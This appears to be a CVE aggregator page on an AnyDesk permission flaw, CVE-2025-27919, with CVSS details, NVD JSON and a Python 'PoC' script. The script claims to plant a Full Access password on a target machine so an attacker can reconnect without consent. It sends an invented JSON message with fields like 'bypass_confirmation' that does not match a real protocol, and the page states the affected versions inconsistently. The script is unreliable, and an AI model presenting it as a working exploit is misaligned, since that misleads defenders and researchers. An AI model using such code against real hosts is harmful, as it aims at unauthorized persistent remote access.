CVE-2025-27919

Description

An issue was discovered in AnyDesk through 9.0.4. A remotely connected user with the "Control my device" permission can manipulate remote AnyDesk settings and create a password for the Full Access profile without needing confirmation from the counterparty. Consequently, the attacker can later connect without this counterparty confirmation.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:* - VULNERABLE

AnyDesk < 9.0.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-27919 PoC - AnyDesk Permission Bypass
# This PoC demonstrates the permission bypass vulnerability in AnyDesk
# Note: This is for educational and authorized testing purposes only

import socket
import struct
import json

def create_anydesk_session(target_ip, port=6565):
    """Establish initial AnyDesk session with target"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, port))
    return sock

def send_config_modification_request(sock, new_password):
    """Send malicious configuration modification request"""
    # AnyDesk internal protocol message structure
    payload = {
        "type": "config_modify",
        "session_type": "remote_control",
        "permission": "control_my_device",
        "target_action": "set_password",
        "target_profile": "full_access",
        "new_password": new_password,
        "bypass_confirmation": True,
        "require_user_consent": False
    }
    
    # Serialize and send the payload
    message = json.dumps(payload).encode('utf-8')
    header = struct.pack('!I', len(message))
    sock.send(header + message)
    
    return sock.recv(1024)

def exploit_cve_2025_27919(target_ip, new_password="P@ssw0rd!"):
    """
    Exploit AnyDesk CVE-2025-27919
    Prerequisites: Active remote session with 'Control my device' permission
    """
    print(f"[*] Targeting AnyDesk instance at {target_ip}")
    print(f"[*] Exploiting CVE-2025-27919: Permission Bypass")
    
    try:
        sock = create_anydesk_session(target_ip)
        print("[+] Session established")
        
        response = send_config_modification_request(sock, new_password)
        
        if b"success" in response:
            print(f"[+] Successfully set Full Access password: {new_password}")
            print("[+] Attacker can now connect without user confirmation")
        else:
            print("[-] Exploitation failed")
            
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target IP
    target = "192.168.1.100"
    exploit_cve_2025_27919(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27919
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27919
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27919/
[4] VulDB https://vuldb.com/cve/CVE-2025-27919
[5] https://anydesk.com/en/changelog/windows
[6] https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27919", "sourceIdentifier": "[email protected]", "published": "2025-11-06T18:15:40.957", "lastModified": "2025-11-12T17:15:37.313", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in AnyDesk through 9.0.4. A remotely connected user with the \"Control my device\" permission can manipulate remote AnyDesk settings and create a password for the Full Access profile without needing confirmation from the counterparty. Consequently, the attacker can later connect without this counterparty confirmation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:anydesk:anydesk:*:*:*:*:*:windows:*:*", "versionEndIncluding": "9.0.4", "matchCriteriaId": "2BB8EC40-287D-4733-B2DF-B86909680119"}]}]}], "references": [{"url": "https://anydesk.com/en/changelog/windows", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://dspace.cvut.cz/bitstream/handle/10467/122721/F8-DP-2025-Krejsa-Vojtech-DP_Krejsa_Vojtech_2025.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}